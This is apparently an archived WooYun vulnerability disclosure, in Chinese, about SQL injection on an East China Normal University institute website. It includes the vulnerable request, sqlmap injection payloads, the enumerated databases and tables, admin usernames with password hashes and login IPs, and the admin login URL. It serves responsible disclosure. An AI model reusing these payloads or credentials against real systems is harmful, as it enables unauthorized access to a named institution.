乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-14: 细节已通知厂商并且等待厂商处理中 2015-12-15: 厂商已经确认,细节仅向厂商公开 2015-12-25: 细节向核心白帽子及相关领域专家公开 2016-01-04: 细节向普通白帽子公开 2016-01-14: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
如题
0x01 漏洞描述
华东师范大学计算科学研究所SQL注入,并且后台弱口令,可登录红土爱
0x02 漏洞位置
http://itcs.ecnu.edu.cn/
0x03 漏洞详细
GET /e/DetailInfo.php?id=193&num=2 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://itcs.ecnu.edu.cn:80/Cookie: PHPSESSID=sd4dgig5c9arsrc9lp5uoili50d9o0798e1knii25nnf45elhuh1; roundcube_sessid=gvr1dad3fi9572rk9igl3baur8cvh5je397qfoio00uuvt1mocl1Host: itcs.ecnu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
注入点信息抓取的http请求包如上0x04 漏洞测试工具
sqlmap
0x05 漏洞结果服务器以及注入点信息
sqlmap identified the following injection points with a total of 47 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=193 AND 4124=4124&num=2 Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: id=-3742 UNION ALL SELECT CONCAT(0x7173616671,0x744f435a717457786963,0x7166797971),NULL,NULL,NULL,NULL,NULL#&num=2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=193 AND SLEEP(5)&num=2---[07:22:10] [INFO] the back-end DBMS is MySQLweb server operating system: Linux SuSEweb application technology: Apache 2.2.12, PHP 5.3.17back-end DBMS: MySQL 5.0.11
数据库信息
web server operating system: Linux SuSEweb application technology: Apache 2.2.12, PHP 5.3.17back-end DBMS: MySQL 5.0.11[07:25:17] [INFO] testing if current user is DBA[07:25:17] [INFO] fetching current user[07:25:17] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'current user is DBA: False[07:25:17] [INFO] fetching database names[07:25:18] [INFO] the SQL query used returns 3 entries[07:25:18] [INFO] retrieved: "information_schema"[07:25:18] [INFO] retrieved: "echao"[07:25:18] [INFO] retrieved: "test"available databases [3]: [*] echao[*] information_schema[*] test
数据表信息
Database: echao [30 tables]+----------------+| user || admin || columntype || eadmin || ecolumntype || efooterinfo || eimagelink || einfo || emember || emenu || emessage || emessageanswer || eotherlink || equestion || erole || eroletomenu || eusertorole || footerinfo || imagelink || info || member || menu || message || messageanswer || otherlink || question || role || roletomenu || test || usertorole |+----------------+
管理员表数据
Database: echaoTable: admin[2 entries]+----+--------+-----------------+----------------------------------+---------------+---------------------+------------+| id | IsShow | LoginIP | UserPwd | UserName | LoginTime | LoginCount |+----+--------+-----------------+----------------------------------+---------------+---------------------+------------+| 9 | 1 | 219.228.63.93 | 12e6d7a3698aa5679898da6a447a4afc | administrator | 2015-10-12 14:17:24 | 0 || 10 | 1 | 124.128.104.249 | 21232f297a57a5a743894a0e4a801fc3 | admin | 2015-12-13 07:27:00 | 0 |+----+--------+-----------------+----------------------------------+---------------+---------------------+------------+
解密发现原来是弱口令寻找后台,经过搜索,找到网址
http://itcs.ecnu.edu.cn/e/admin/Login.html
登录后
over!
加强网站整体防护
危害等级:高
漏洞Rank:10
确认时间:2015-12-15 13:55
通知二级单位处理。
暂无
![[%7%7$FI]SWCVXPSWMGILUT.png](http://wimg.zone.ci/upload/201512/1315375441a6c5465d40b78720200b40e09756d7.png)
